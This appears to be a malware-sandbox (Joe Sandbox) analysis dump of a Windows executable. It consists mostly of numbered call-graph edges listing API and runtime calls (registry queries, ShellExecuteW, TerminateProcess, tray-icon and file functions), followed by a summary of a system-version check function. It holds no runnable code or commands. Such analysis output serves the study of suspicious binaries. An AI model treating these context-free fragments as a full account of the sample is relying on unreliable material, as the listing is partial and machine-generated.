97080->97082 97081->97080 97082->97034 97083->97078 97085 e2954 __wsopen_s 97084->97085 97086 8fe0b 22 API calls 97085->97086 97087 e2971 97086->97087 97088 75722 22 API calls 97087->97088 97089 e297b 97088->97089 97090 e274e 27 API calls 97089->97090 97091 e2986 97090->97091 97092 7511f 64 API calls 97091->97092 97093 e299b 97092->97093 97094 e29bf 97093->97094 97095 e2a6c 97093->97095 97096 e2e66 75 API calls 97094->97096 97097 e2e66 75 API calls 97095->97097 97098 e29c4 97096->97098 97099 e2a38 97097->97099 97133 e2a75 messages 97098->97133 97183 9d583 26 API calls 97098->97183 97102 750f5 40 API calls 97099->97102 97099->97133 97101 e29ed 97184 9d583 26 API calls 97101->97184 97103 e2a91 97102->97103 97104 750f5 40 API calls 97103->97104 97105 e2aa1 97104->97105 97106 750f5 40 API calls 97105->97106 97108 e2abc 97106->97108 97109 750f5 40 API calls 97108->97109 97110 e2acc 97109->97110 97111 750f5 40 API calls 97110->97111 97112 e2ae7 97111->97112 97113 750f5 40 API calls 97112->97113 97114 e2af7 97113->97114 97115 750f5 40 API calls 97114->97115 97116 e2b07 97115->97116 97117 750f5 40 API calls 97116->97117 97118 e2b17 97117->97118 97179 e3017 GetTempPathW GetTempFileNameW 97118->97179 97120 e2b22 97121 9e5eb 29 API calls 97120->97121 97131 e2b33 97121->97131 97122 e2bed 97123 9e678 67 API calls 97122->97123 97124 e2bf8 97123->97124 97126 e2bfe DeleteFileW 97124->97126 97127 e2c12 97124->97127 97125 750f5 40 API calls 97125->97131 97126->97133 97131->97122 97131->97125 97131->97133 97134 9dbb3 65 API calls 97131->97134 97133->96880 97134->97131 97139->96807 97141 b30bb 97140->97141 97142 733dd 97140->97142 97143 8fddb 22 API calls 97141->97143 97185 733ee 97142->97185 97146 b30c5 _wcslen 97143->97146 97145 733e8 97145->96833 97147 8fe0b 22 API calls 97146->97147 97148 b30fe __fread_nolock 97147->97148 97149->96840 97150->96854 97152 76d34 97151->97152 97153 76d91 97151->97153 97152->97153 97155 76d3f 97152->97155 97154 793b2 22 API calls 97153->97154 97161 
76d62 __fread_nolock 97154->97161 97156 b4c9d 97155->97156 97157 76d5a 97155->97157 97158 8fddb 22 API calls 97156->97158 97165 76f34 22 API calls 97157->97165 97160 b4ca7 97158->97160 97162 8fe0b 22 API calls 97160->97162 97161->97001 97163 b4cda 97162->97163 97164->97015 97165->97161 97167 763b6 __fread_nolock 97166->97167 97168 76382 97166->97168 97167->97026 97168->97167 97169 b4a82 97168->97169 97170 763a9 97168->97170 97172 8fddb 22 API calls 97169->97172 97171 7a587 22 API calls 97170->97171 97171->97167 97173 b4a91 97172->97173 97174 8fe0b 22 API calls 97173->97174 97175 b4ac5 __fread_nolock 97174->97175 97176->97027 97177->97069 97178->97071 97179->97120 97183->97101 97184->97099 97186 733fe _wcslen 97185->97186 97187 b311d 97186->97187 97188 73411 97186->97188 97190 8fddb 22 API calls 97187->97190 97189 7a587 22 API calls 97188->97189 97191 7341e __fread_nolock 97189->97191 97192 b3127 97190->97192 97191->97145 97193 8fe0b 22 API calls 97192->97193 97194 b3157 __fread_nolock 97193->97194 97196 77510 53 API calls 97195->97196 97197 f7f90 97196->97197 97221 f7fd5 messages 97197->97221 97233 f8cd3 97197->97233 97199 f8281 97200 f844f 97199->97200 97205 f828f 97199->97205 97281 f8ee4 60 API calls 97200->97281 97203 f845e 97204 f846a 97203->97204 97203->97205 97204->97221 97246 f7e86 97205->97246 97206 77510 53 API calls 97223 f8049 97206->97223 97211 f82c8 97261 8fc70 97211->97261 97214 f82e8 97278 e359c 82 API calls __wsopen_s 97214->97278 97215 f8302 97265 763eb 97215->97265 97218 f82f3 GetCurrentProcess TerminateProcess 97218->97215 97221->96884 97223->97199 97223->97206 97223->97221 97276 d417d 22 API calls __fread_nolock 97223->97276 97277 f851d 42 API calls _strftime 97223->97277 97224 f84c5 97224->97221 97228 f84d9 FreeLibrary 97224->97228 97225 804f0 22 API calls 97226 f8341 97225->97226 97279 f8b7b 75 API calls 97226->97279 97227 804f0 22 API calls 97232 f8352 97227->97232 97228->97221 97232->97224 97232->97227 97280 7aceb 23 API calls messages 
97232->97280 97282 f8b7b 75 API calls 97232->97282 97234 7aec9 22 API calls 97233->97234 97235 f8cee CharLowerBuffW 97234->97235 97283 d8e54 97235->97283 97239 7a961 22 API calls 97240 f8d2a 97239->97240 97241 76d25 22 API calls 97240->97241 97242 f8d3e 97241->97242 97243 793b2 22 API calls 97242->97243 97245 f8d48 _wcslen 97243->97245 97244 f8e5e _wcslen 97244->97223 97245->97244 97290 f851d 42 API calls _strftime 97245->97290 97247 f7ea1 97246->97247 97248 f7eec 97246->97248 97249 8fe0b 22 API calls 97247->97249 97252 f9096 97248->97252 97250 f7ec3 97249->97250 97250->97248 97251 8fddb 22 API calls 97250->97251 97251->97250 97253 f92ab messages 97252->97253 97260 f90ba _strcat _wcslen 97252->97260 97253->97211 97254 7b6b5 39 API calls 97254->97260 97255 7b567 39 API calls 97255->97260 97256 7b38f 39 API calls 97256->97260 97257 9ea0c 21 API calls ___std_exception_copy 97257->97260 97258 77510 53 API calls 97258->97260 97260->97253 97260->97254 97260->97255 97260->97256 97260->97257 97260->97258 97293 defae 24 API calls _wcslen 97260->97293 97262 8fc85 97261->97262 97263 8fd1d ReadFile 97262->97263 97264 8fceb 97262->97264 97263->97264 97264->97214 97264->97215 97266 763f3 97265->97266 97267 8fddb 22 API calls 97266->97267 97268 76401 97267->97268 97294 76a26 97268->97294 97271 76a50 97297 7b010 97271->97297 97273 76a60 97274 8fe0b 22 API calls 97273->97274 97275 76afc 97273->97275 97274->97275 97275->97225 97275->97232 97276->97223 97277->97223 97278->97218 97279->97232 97280->97232 97281->97203 97282->97232 97285 d8e74 _wcslen 97283->97285 97284 d8f63 97284->97239 97284->97245 97285->97284 97287 d8ea9 97285->97287 97289 d8f68 97285->97289 97287->97284 97291 8ce60 41 API calls 97287->97291 97289->97284 97292 8ce60 41 API calls 97289->97292 97290->97244 97291->97287 97292->97289 97293->97260 97295 8fddb 22 API calls 97294->97295 97296 76409 97295->97296 97296->97271 97298 7b01b 97297->97298 97299 bfb4d 97298->97299 97302 7b023 messages 97298->97302 97300 8fddb 22 
API calls 97299->97300 97304 bfb59 97300->97304 97301 7b02a 97301->97273 97302->97301 97305 7b090 22 API calls messages 97302->97305 97304->97304 97305->97302 97307 ddbdc GetFileAttributesW 97306->97307 97308 dd4d5 97306->97308 97307->97308 97309 ddbe8 FindFirstFileW 97307->97309 97308->96704 97309->97308 97310 ddbf9 FindClose 97309->97310 97310->97308 97312 7ae01 97311->97312 97315 7ae1c messages 97311->97315 97313 7aec9 22 API calls 97312->97313 97314 7ae09 CharUpperBuffW 97313->97314 97314->97315 97315->96719 97317 7acae 97316->97317 97319 7acd1 97317->97319 97346 e359c 82 API calls __wsopen_s 97317->97346 97319->96759 97321 bfadb 97320->97321 97322 7ad92 97320->97322 97323 8fddb 22 API calls 97322->97323 97324 7ad99 97323->97324 97347 7adcd 97324->97347 97327->96770 97328->96763 97329->96763 97330->96723 97331->96774 97332->96738 97333->96774 97334->96774 97335->96759 97336->96759 97337->96759 97338->96759 97339->96759 97340->96759 97341->96750 97342->96774 97343->96757 97344->96767 97345->96774 97346->97319 97351 7addd 97347->97351 97348 7adb6 97348->96759 97349 8fddb 22 API calls 97349->97351 97350 7a961 22 API calls 97350->97351 97351->97348 97351->97349 97351->97350 97352 7a8c7 22 API calls 97351->97352 97353 7adcd 22 API calls 97351->97353 97352->97351 97353->97351 97354 b2ba5 97355 72b25 97354->97355 97356 b2baf 97354->97356 97382 72b83 7 API calls 97355->97382 97397 73a5a 97356->97397 97359 b2bb8 97361 79cb3 22 API calls 97359->97361 97364 b2bc6 97361->97364 97363 72b2f 97365 72b44 97363->97365 97386 73837 97363->97386 97366 b2bce 97364->97366 97367 b2bf5 97364->97367 97373 72b5f 97365->97373 97396 730f2 Shell_NotifyIconW ___scrt_fastfail 97365->97396 97369 733c6 22 API calls 97366->97369 97370 733c6 22 API calls 97367->97370 97371 b2bd9 97369->97371 97372 b2bf1 GetForegroundWindow ShellExecuteW 97370->97372 97374 76350 22 API calls 97371->97374 97378 b2c26 97372->97378 97379 72b66 SetCurrentDirectoryW 97373->97379 97377 b2be7 97374->97377 97380 733c6 22 
API calls 97377->97380 97378->97373 97381 72b7a 97379->97381 97380->97372 97404 72cd4 7 API calls 97382->97404 97384 72b2a 97385 72c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97384->97385 97385->97363 97387 73862 ___scrt_fastfail 97386->97387 97405 74212 97387->97405 97390 738e8 97392 73906 Shell_NotifyIconW 97390->97392 97393 b3386 Shell_NotifyIconW 97390->97393 97409 73923 97392->97409 97395 7391c 97395->97365 97396->97373 97398 b1f50 __wsopen_s 97397->97398 97399 73a67 GetModuleFileNameW 97398->97399 97400 79cb3 22 API calls 97399->97400 97401 73a8d 97400->97401 97402 73aa2 23 API calls 97401->97402 97403 73a97 97402->97403 97403->97359 97404->97384 97406 738b7 97405->97406 97407 b35a4 97405->97407 97406->97390 97431 dc874 42 API calls _strftime 97406->97431 97407->97406 97408 b35ad DestroyIcon 97407->97408 97408->97406 97410 7393f 97409->97410 97428 73a13 97409->97428 97411 76270 22 API calls 97410->97411 97412 7394d 97411->97412 97413 b3393 LoadStringW 97412->97413 97414 7395a 97412->97414 97416 b33ad 97413->97416 97415 76b57 22 API calls 97414->97415 97417 7396f 97415->97417 97420 7a8c7 22 API calls 97416->97420 97430 73994 ___scrt_fastfail 97416->97430 97418 b33c9 97417->97418 97419 7397c 97417->97419 97422 76350 22 API calls 97418->97422 97419->97416 97421 73986 97419->97421 97420->97430 97423 76350 22 API calls 97421->97423 97424 b33d7 97422->97424 97423->97430 97426 733c6 22 API calls 97424->97426 97424->97430 97425 739f9 Shell_NotifyIconW 97425->97428 97427 b33f9 97426->97427 97429 733c6 22 API calls 97427->97429 97428->97395 97429->97430 97430->97425 97431->97390 97432 72e37 97433 7a961 22 API calls 97432->97433 97434 72e4d 97433->97434 97511 74ae3 97434->97511 97436 72e6b 97437 73a5a 24 API calls 97436->97437 97438 72e7f 97437->97438 97439 79cb3 22 API calls 97438->97439 97440 72e8c 97439->97440 97441 74ecb 94 API calls 97440->97441 97442 72ea5 97441->97442 97443 72ead 97442->97443 97444 b2cb0 97442->97444 97447 7a8c7 22 API calls 
97443->97447 97445 e2cf9 80 API calls 97444->97445 97446 b2cc3 97445->97446 97448 b2ccf 97446->97448 97450 74f39 68 API calls 97446->97450 97449 72ec3 97447->97449 97452 74f39 68 API calls 97448->97452 97525 76f88 22 API calls 97449->97525 97450->97448 97454 b2ce5 97452->97454 97453 72ecf 97455 79cb3 22 API calls 97453->97455 97539 73084 22 API calls 97454->97539 97456 72edc 97455->97456 97526 7a81b 41 API calls 97456->97526 97459 72eec 97461 79cb3 22 API calls 97459->97461 97460 b2d02 97540 73084 22 API calls 97460->97540 97462 72f12 97461->97462 97527 7a81b 41 API calls 97462->97527 97465 b2d1e 97466 73a5a 24 API calls 97465->97466 97467 b2d44 97466->97467 97541 73084 22 API calls 97467->97541 97468 72f21 97471 7a961 22 API calls 97468->97471 97470 b2d50 97472 7a8c7 22 API calls 97470->97472 97473 72f3f 97471->97473 97474 b2d5e 97472->97474 97528 73084 22 API calls 97473->97528 97542 73084 22 API calls 97474->97542 97477 72f4b 97529 94a28 40 API calls 3 library calls 97477->97529 97478 b2d6d 97482 7a8c7 22 API calls 97478->97482 97480 72f59 97480->97454 97481 72f63 97480->97481 97530 94a28 40 API calls 3 library calls 97481->97530 97484 b2d83 97482->97484 97543 73084 22 API calls 97484->97543 97485 72f6e 97485->97460 97486 72f78 97485->97486 97531 94a28 40 API calls 3 library calls 97486->97531 97489 b2d90 97490 72f83 97490->97465 97491 72f8d 97490->97491 97532 94a28 40 API calls 3 library calls 97491->97532 97493 72f98 97494 72fdc 97493->97494 97533 73084 22 API calls 97493->97533 97494->97478 97495 72fe8 97494->97495 97495->97489 97497 763eb 22 API calls 97495->97497 97499 72ff8 97497->97499 97498 72fbf 97500 7a8c7 22 API calls 97498->97500 97501 76a50 22 API calls 97499->97501 97502 72fcd 97500->97502 97503 73006 97501->97503 97534 73084 22 API calls 97502->97534 97535 770b0 23 API calls 97503->97535 97506 73021 97509 73065 97506->97509 97536 76f88 22 API calls 97506->97536 97537 770b0 23 API calls 97506->97537 97538 73084 22 API calls 97506->97538 97512 74af0 
__wsopen_s 97511->97512 97513 76b57 22 API calls 97512->97513 97514 74b22 97512->97514 97513->97514 97515 74c6d 22 API calls 97514->97515 97520 74b58 97514->97520 97515->97514 97516 79cb3 22 API calls 97518 74c52 97516->97518 97517 79cb3 22 API calls 97517->97520 97519 7515f 22 API calls 97518->97519 97522 74c5e 97519->97522 97520->97517 97521 7515f 22 API calls 97520->97521 97523 74c29 97520->97523 97524 74c6d 22 API calls 97520->97524 97521->97520 97522->97436 97523->97516 97523->97522 97524->97520 97525->97453 97526->97459 97527->97468 97528->97477 97529->97480 97530->97485 97531->97490 97532->97493 97533->97498 97534->97494 97535->97506 97536->97506 97537->97506 97538->97506 97539->97460 97540->97465 97541->97470 97542->97478 97543->97489 97544 a90fa 97545 a9107 97544->97545 97549 a911f 97544->97549 97594 9f2d9 20 API calls __dosmaperr 97545->97594 97547 a910c 97595 a27ec 26 API calls pre_c_initialization 97547->97595 97550 a917a 97549->97550 97558 a9117 97549->97558 97596 afdc4 21 API calls 2 library calls 97549->97596 97552 9d955 __fread_nolock 26 API calls 97550->97552 97553 a9192 97552->97553 97564 a8c32 97553->97564 97555 a9199 97556 9d955 __fread_nolock 26 API calls 97555->97556 97555->97558 97557 a91c5 97556->97557 97557->97558 97559 9d955 __fread_nolock 26 API calls 97557->97559 97560 a91d3 97559->97560 97560->97558 97561 9d955 __fread_nolock 26 API calls 97560->97561 97562 a91e3 97561->97562 97563 9d955 __fread_nolock 26 API calls 97562->97563 97563->97558 97565 a8c3e ___DestructExceptionObject 97564->97565 97566 a8c5e 97565->97566 97567 a8c46 97565->97567 97568 a8d24 97566->97568 97573 a8c97 97566->97573 97598 9f2c6 20 API calls __dosmaperr 97567->97598 97605 9f2c6 20 API calls __dosmaperr 97568->97605 97570 a8c4b 97599 9f2d9 20 API calls __dosmaperr 97570->97599 97575 a8cbb 97573->97575 97576 a8ca6 97573->97576 97574 a8d29 97606 9f2d9 20 API calls __dosmaperr 97574->97606 97597 a5147 EnterCriticalSection 97575->97597 97600 9f2c6 20 API calls 
__dosmaperr 97576->97600 97580 a8cb3 97607 a27ec 26 API calls pre_c_initialization 97580->97607 97581 a8cab 97601 9f2d9 20 API calls __dosmaperr 97581->97601 97582 a8cc1 97586 a8cdd 97582->97586 97587 a8cf2 97582->97587 97584 a8c53 __fread_nolock 97584->97555 97602 9f2d9 20 API calls __dosmaperr 97586->97602 97589 a8d45 __fread_nolock 38 API calls 97587->97589 97591 a8ced 97589->97591 97590 a8ce2 97603 9f2c6 20 API calls __dosmaperr 97590->97603 97604 a8d1c LeaveCriticalSection __wsopen_s 97591->97604 97594->97547 97595->97558 97596->97550 97597->97582 97598->97570 97599->97584 97600->97581 97601->97580 97602->97590 97603->97591 97604->97584 97605->97574 97606->97580 97607->97584 97608 73156 97611 73170 97608->97611 97612 73187 97611->97612 97613 7318c 97612->97613 97614 731eb 97612->97614 97650 731e9 97612->97650 97615 73265 PostQuitMessage 97613->97615 97616 73199 97613->97616 97618 b2dfb 97614->97618 97619 731f1 97614->97619 97623 7316a 97615->97623 97621 731a4 97616->97621 97622 b2e7c 97616->97622 97617 731d0 DefWindowProcW 97617->97623 97667 718e2 10 API calls 97618->97667 97624 7321d SetTimer RegisterWindowMessageW 97619->97624 97625 731f8 97619->97625 97629 b2e68 97621->97629 97630 731ae 97621->97630 97671 dbf30 34 API calls ___scrt_fastfail 97622->97671 97624->97623 97631 73246 CreatePopupMenu 97624->97631 97626 73201 KillTimer 97625->97626 97627 b2d9c 97625->97627 97663 730f2 Shell_NotifyIconW ___scrt_fastfail 97626->97663 97639 b2da1 97627->97639 97640 b2dd7 MoveWindow 97627->97640 97628 b2e1c 97668 8e499 42 API calls 97628->97668 97656 dc161 97629->97656 97636 b2e4d 97630->97636 97637 731b9 97630->97637 97631->97623 97636->97617 97670 d0ad7 22 API calls 97636->97670 97642 731c4 97637->97642 97643 73253 97637->97643 97638 b2e8e 97638->97617 97638->97623 97644 b2da7 97639->97644 97645 b2dc6 SetFocus 97639->97645 97640->97623 97641 73214 97664 73c50 DeleteObject DestroyWindow 97641->97664 97642->97617 97669 730f2 Shell_NotifyIconW ___scrt_fastfail 
97642->97669 97665 7326f 44 API calls ___scrt_fastfail 97643->97665 97644->97642 97649 b2db0 97644->97649 97645->97623 97666 718e2 10 API calls 97649->97666 97650->97617 97651 73263 97651->97623 97654 b2e41 97655 73837 49 API calls 97654->97655 97655->97650 97657 dc179 ___scrt_fastfail 97656->97657 97658 dc276 97656->97658 97659 73923 24 API calls 97657->97659 97658->97623 97661 dc1a0 97659->97661 97660 dc25f KillTimer SetTimer 97660->97658 97661->97660 97662 dc251 Shell_NotifyIconW 97661->97662 97662->97660 97663->97641 97664->97623 97665->97651 97666->97623 97667->97628 97668->97642 97669->97654 97670->97650 97671->97638 97672 903fb 97673 90407 ___DestructExceptionObject 97672->97673 97701 8feb1 97673->97701 97675 9040e 97676 90561 97675->97676 97679 90438 97675->97679 97728 9083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97676->97728 97678 90568 97729 94e52 28 API calls _abort 97678->97729 97690 90477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97679->97690 97712 a247d 97679->97712 97681 9056e 97730 94e04 28 API calls _abort 97681->97730 97685 90576 97686 90457 97688 904d8 97720 90959 97688->97720 97690->97688 97724 94e1a 38 API calls 3 library calls 97690->97724 97692 904de 97693 904f3 97692->97693 97725 90992 GetModuleHandleW 97693->97725 97695 904fa 97695->97678 97696 904fe 97695->97696 97697 90507 97696->97697 97726 94df5 28 API calls _abort 97696->97726 97727 90040 13 API calls 2 library calls 97697->97727 97700 9050f 97700->97686 97702 8feba 97701->97702 97731 90698 IsProcessorFeaturePresent 97702->97731 97704 8fec6 97732 92c94 10 API calls 3 library calls 97704->97732 97706 8fecb 97707 8fecf 97706->97707 97733 a2317 97706->97733 97707->97675 97710 8fee6 97710->97675 97715 a2494 97712->97715 97713 90a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97714 90451 97713->97714 
97714->97686 97716 a2421 97714->97716 97715->97713 97718 a2450 97716->97718 97717 90a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97719 a2479 97717->97719 97718->97717 97719->97690 97776 92340 97720->97776 97722 9096c GetStartupInfoW 97723 9097f 97722->97723 97723->97692 97724->97688 97725->97695 97726->97697 97727->97700 97728->97678 97729->97681 97730->97685 97731->97704 97732->97706 97737 ad1f6 97733->97737 97736 92cbd 8 API calls 3 library calls 97736->97707 97740 ad213 97737->97740 97741 ad20f 97737->97741 97738 90a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97739 8fed8 97738->97739 97739->97710 97739->97736 97740->97741 97743 a4bfb 97740->97743 97741->97738 97744 a4c07 ___DestructExceptionObject 97743->97744 97755 a2f5e EnterCriticalSection 97744->97755 97746 a4c0e 97756 a50af 97746->97756 97748 a4c1d 97749 a4c2c 97748->97749 97769 a4a8f 29 API calls 97748->97769 97771 a4c48 LeaveCriticalSection _abort 97749->97771 97752 a4c27 97770 a4b45 GetStdHandle GetFileType 97752->97770 97753 a4c3d __fread_nolock 97753->97740 97755->97746 97757 a50bb ___DestructExceptionObject 97756->97757 97758 a50c8 97757->97758 97759 a50df 97757->97759 97773 9f2d9 20 API calls __dosmaperr 97758->97773 97772 a2f5e EnterCriticalSection 97759->97772 97762 a50cd 97774 a27ec 26 API calls pre_c_initialization 97762->97774 97763 a50eb 97767 a5000 __wsopen_s 21 API calls 97763->97767 97768 a5117 97763->97768 97765 a50d7 __fread_nolock 97765->97748 97767->97763 97775 a513e LeaveCriticalSection _abort 97768->97775 97769->97752 97770->97749 97771->97753 97772->97763 97773->97762 97774->97765 97775->97765 97777 92357 97776->97777 97777->97722 97777->97777 97778 71033 97783 74c91 97778->97783 97782 71042 97784 7a961 22 API calls 97783->97784 97785 74cff 97784->97785 97791 73af0 97785->97791 97787 74d9c 97789 71038 
97787->97789 97794 751f7 22 API calls __fread_nolock 97787->97794 97790 900a3 29 API calls __onexit 97789->97790 97790->97782 97795 73b1c 97791->97795 97794->97787 97796 73b0f 97795->97796 97797 73b29 97795->97797 97796->97787 97797->97796 97798 73b30 RegOpenKeyExW 97797->97798 97798->97796 97799 73b4a RegQueryValueExW 97798->97799 97800 73b80 RegCloseKey 97799->97800 97801 73b6b 97799->97801 97800->97796 97801->97800 97802 7fe73 97809 8ceb1 97802->97809 97804 7fe89 97818 8cf92 97804->97818 97806 7feb3 97830 e359c 82 API calls __wsopen_s 97806->97830 97808 c4ab8 97810 8cebf 97809->97810 97811 8ced2 97809->97811 97831 7aceb 23 API calls messages 97810->97831 97813 8cf05 97811->97813 97814 8ced7 97811->97814 97832 7aceb 23 API calls messages 97813->97832 97815 8fddb 22 API calls 97814->97815 97817 8cec9 97815->97817 97817->97804 97819 76270 22 API calls 97818->97819 97820 8cfc9 97819->97820 97821 8cffa 97820->97821 97822 79cb3 22 API calls 97820->97822 97821->97806 97823 cd166 97822->97823 97824 76350 22 API calls 97823->97824 97825 cd171 97824->97825 97833 8d2f0 40 API calls 97825->97833 97827 cd184 97829 cd188 97827->97829 97834 7aceb 23 API calls messages 97827->97834 97829->97829 97830->97808 97831->97817 97832->97817 97833->97827 97834->97829 97835 7df10 97838 7b710 97835->97838 97839 7b72b 97838->97839 97840 c00f8 97839->97840 97841 c0146 97839->97841 97853 7b750 97839->97853 97844 c0102 97840->97844 97847 c010f 97840->97847 97840->97853 97880 f58a2 235 API calls 2 library calls 97841->97880 97878 f5d33 235 API calls 97844->97878 97864 7ba20 97847->97864 97879 f61d0 235 API calls 2 library calls 97847->97879 97850 c03d9 97850->97850 97852 7bbe0 40 API calls 97852->97853 97853->97852 97856 7ba4e 97853->97856 97857 c0322 97853->97857 97853->97864 97865 8d336 40 API calls 97853->97865 97866 7ec40 235 API calls 97853->97866 97867 7a8c7 22 API calls 97853->97867 97869 7a81b 41 API calls 97853->97869 97870 8d2f0 40 API calls 97853->97870 97871 8a01b 235 API calls 
97853->97871 97872 90242 5 API calls __Init_thread_wait 97853->97872 97873 8edcd 22 API calls 97853->97873 97874 900a3 29 API calls __onexit 97853->97874 97875 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97853->97875 97876 8ee53 82 API calls 97853->97876 97877 8e5ca 235 API calls 97853->97877 97881 7aceb 23 API calls messages 97853->97881 97882 cf6bf 23 API calls 97853->97882 97883 f5c0c 82 API calls 97857->97883 97864->97856 97884 e359c 82 API calls __wsopen_s 97864->97884 97865->97853 97866->97853 97867->97853 97869->97853 97870->97853 97871->97853 97872->97853 97873->97853 97874->97853 97875->97853 97876->97853 97877->97853 97878->97847 97879->97864 97880->97853 97881->97853 97882->97853 97883->97864 97884->97850 97885 7f7bf 97886 7fcb6 97885->97886 97887 7f7d3 97885->97887 97922 7aceb 23 API calls messages 97886->97922 97889 7fcc2 97887->97889 97890 8fddb 22 API calls 97887->97890 97923 7aceb 23 API calls messages 97889->97923 97892 7f7e5 97890->97892 97892->97889 97893 7f83e 97892->97893 97894 7fd3d 97892->97894 97896 81310 235 API calls 97893->97896 97911 7ed9d messages 97893->97911 97924 e1155 22 API calls 97894->97924 97917 7ec76 messages 97896->97917 97898 7fef7 97905 7a8c7 22 API calls 97898->97905 97898->97911 97899 8fddb 22 API calls 97899->97917 97901 c4b0b 97926 e359c 82 API calls __wsopen_s 97901->97926 97902 c4600 97908 7a8c7 22 API calls 97902->97908 97902->97911 97905->97911 97907 7a8c7 22 API calls 97907->97917 97908->97911 97909 7fbe3 97909->97911 97912 c4bdc 97909->97912 97919 7f3ae messages 97909->97919 97910 7a961 22 API calls 97910->97917 97927 e359c 82 API calls __wsopen_s 97912->97927 97913 90242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97913->97917 97915 c4beb 97928 e359c 82 API calls __wsopen_s 97915->97928 97916 900a3 29 API calls pre_c_initialization 97916->97917 97917->97898 97917->97899 97917->97901 97917->97902 97917->97907 97917->97909 
97917->97910 97917->97911 97917->97913 97917->97915 97917->97916 97918 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97917->97918 97917->97919 97920 801e0 235 API calls 2 library calls 97917->97920 97921 806a0 41 API calls messages 97917->97921 97918->97917 97919->97911 97925 e359c 82 API calls __wsopen_s 97919->97925 97920->97917 97921->97917 97922->97889 97923->97894 97924->97911 97925->97911 97926->97911 97927->97915 97928->97911 97929 c3f75 97930 8ceb1 23 API calls 97929->97930 97931 c3f8b 97930->97931 97932 c4006 97931->97932 97940 8e300 23 API calls 97931->97940 97935 7bf40 235 API calls 97932->97935 97934 c3fe6 97937 c4052 97934->97937 97941 e1abf 22 API calls 97934->97941 97935->97937 97938 c4a88 97937->97938 97942 e359c 82 API calls __wsopen_s 97937->97942 97940->97934 97941->97932 97942->97938 97943 7dddc 97944 7b710 235 API calls 97943->97944 97945 7ddea 97944->97945 97946 7105b 97951 7344d 97946->97951 97948 7106a 97982 900a3 29 API calls __onexit 97948->97982 97950 71074 97952 7345d __wsopen_s 97951->97952 97953 7a961 22 API calls 97952->97953 97954 73513 97953->97954 97955 73a5a 24 API calls 97954->97955 97956 7351c 97955->97956 97983 73357 97956->97983 97959 733c6 22 API calls 97960 73535 97959->97960 97961 7515f 22 API calls 97960->97961 97962 73544 97961->97962 97963 7a961 22 API calls 97962->97963 97964 7354d 97963->97964 97965 7a6c3 22 API calls 97964->97965 97966 73556 RegOpenKeyExW 97965->97966 97967 b3176 RegQueryValueExW 97966->97967 97972 73578 97966->97972 97968 b320c RegCloseKey 97967->97968 97969 b3193 97967->97969 97968->97972 97974 b321e _wcslen 97968->97974 97970 8fe0b 22 API calls 97969->97970 97971 b31ac 97970->97971 97973 75722 22 API calls 97971->97973 97972->97948 97975 b31b7 RegQueryValueExW 97973->97975 97974->97972 97976 74c6d 22 API calls 97974->97976 97980 79cb3 22 API calls 97974->97980 97981 7515f 22 API calls 97974->97981 97977 b31ee messages 97975->97977 97978 b31d4 97975->97978 
97976->97974 97977->97968 97979 76b57 22 API calls 97978->97979 97979->97977 97980->97974 97981->97974 97982->97950 97984 b1f50 __wsopen_s 97983->97984 97985 73364 GetFullPathNameW 97984->97985 97986 73386 97985->97986 97987 76b57 22 API calls 97986->97987 97988 733a4 97987->97988 97988->97959 97989 71098 97994 742de 97989->97994 97993 710a7 97995 7a961 22 API calls 97994->97995 97996 742f5 GetVersionExW 97995->97996 97997 76b57 22 API calls 97996->97997 97998 74342 97997->97998 97999 793b2 22 API calls 97998->97999 98011 74378 97998->98011 98000 7436c 97999->98000 98002 737a0 22 API calls 98000->98002 98001 7441b GetCurrentProcess IsWow64Process 98003 74437 98001->98003 98002->98011 98004 7444f LoadLibraryA 98003->98004 98005 b3824 GetSystemInfo 98003->98005 98006 74460 GetProcAddress 98004->98006 98007 7449c GetSystemInfo 98004->98007 98006->98007 98010 74470 GetNativeSystemInfo 98006->98010 98008 74476 98007->98008 98012 7109d 98008->98012 98013 7447a FreeLibrary 98008->98013 98009 b37df 98010->98008 98011->98001 98011->98009 98014 900a3 29 API calls __onexit 98012->98014 98013->98012 98014->97993

                                        Control-flow Graph (function at 742de; rendered graph with Executed / Not Executed colouring not reproducible in text)
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0007430D
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • GetCurrentProcess.KERNEL32(?,0010CB64,00000000,?,?), ref: 00074422
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00074429
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00074454
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00074466
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00074474
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0007447B
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 000744A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
